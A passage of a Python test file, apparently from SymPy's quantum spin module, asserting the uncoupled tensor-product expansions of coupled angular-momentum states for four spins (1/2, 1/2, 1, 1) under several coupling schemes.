JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 10
)
assert (
uncouple(JzKetCoupled(3, -1, (S.Half, S.Half, 1, 1)))
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 15
+ 2
* sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 15
)
assert (
uncouple(JzKetCoupled(3, -2, (S.Half, S.Half, 1, 1)))
== sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 3
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
)
assert uncouple(JzKetCoupled(3, -3, (S.Half, S.Half, 1, 1))) == TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
assert (
uncouple(JzKetCoupled(2, 2, (S.Half, S.Half, 1, 1)))
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
- sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)
)
/ 3
)
assert (
uncouple(JzKetCoupled(2, 1, (S.Half, S.Half, 1, 1)))
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 12
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 12
- sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 3
)
assert (
uncouple(JzKetCoupled(2, 0, (S.Half, S.Half, 1, 1)))
== -TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 2
- sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 4
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 2
)
assert (
uncouple(JzKetCoupled(2, -1, (S.Half, S.Half, 1, 1)))
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 3
- sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 12
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 12
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 6
)
assert (
uncouple(JzKetCoupled(2, -2, (S.Half, S.Half, 1, 1)))
== -sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 3
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
)
assert (
uncouple(JzKetCoupled(1, 1, (S.Half, S.Half, 1, 1)))
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 30
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 20
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 20
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 30
- sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 10
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 5
)
assert (
uncouple(JzKetCoupled(1, 0, (S.Half, S.Half, 1, 1)))
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 10
- sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 20
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 20
- sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 10
)
assert (
uncouple(JzKetCoupled(1, -1, (S.Half, S.Half, 1, 1)))
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 5
- sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 10
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 20
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 20
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 30
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 30
)
# j1=1/2, j2=1/2, j3=1, j4=1, j12=1, j34=1
assert (
uncouple(
JzKetCoupled(
2, 2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
)
== -sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)
)
/ 2
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
2, 1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
)
== -sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 4
- TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
2, 0, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
)
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 6
- sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 6
)
assert (
uncouple(
JzKetCoupled(
2, -1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
)
== -TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 2
+ TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 2
- sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 4
)
assert (
uncouple(
JzKetCoupled(
2, -2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
)
== -sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 2
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
1, 1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
)
== sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 4
- TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
1, 0, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
)
== TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 2
- TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 2
- TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
1, -1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
)
== TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 2
- TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 2
- sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 4
)
# j1=1/2, j2=1/2, j3=1, j4=1, j12=1, j34=2
assert uncouple(
JzKetCoupled(3, 3, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3)))
) == TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 1)
)
assert (
uncouple(
JzKetCoupled(
3, 2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3))
)
)
== sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)
)
/ 3
)
assert (
uncouple(
JzKetCoupled(
3, 1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3))
)
)
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 15
+ 2
* sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 15
)
assert (
uncouple(
JzKetCoupled(
3, 0, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3))
)
)
== sqrt(10)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 0),
)
/ 5
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 5
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 10
)
assert (
uncouple(
JzKetCoupled(
3, -1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3))
)
)
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 15
+ 2
* sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 15
)
assert (
uncouple(
JzKetCoupled(
3, -2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3))
)
)
== sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 3
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
)
assert uncouple(
JzKetCoupled(3, -3, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3)))
) == TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
assert (
uncouple(
JzKetCoupled(
2, 2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 2))
)
)
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 1),
)
/ 3
- sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 3
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)
)
/ 6
)
assert (
uncouple(
JzKetCoupled(
2, 1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 2))
)
)
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 3
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 12
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 12
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 12
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 12
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
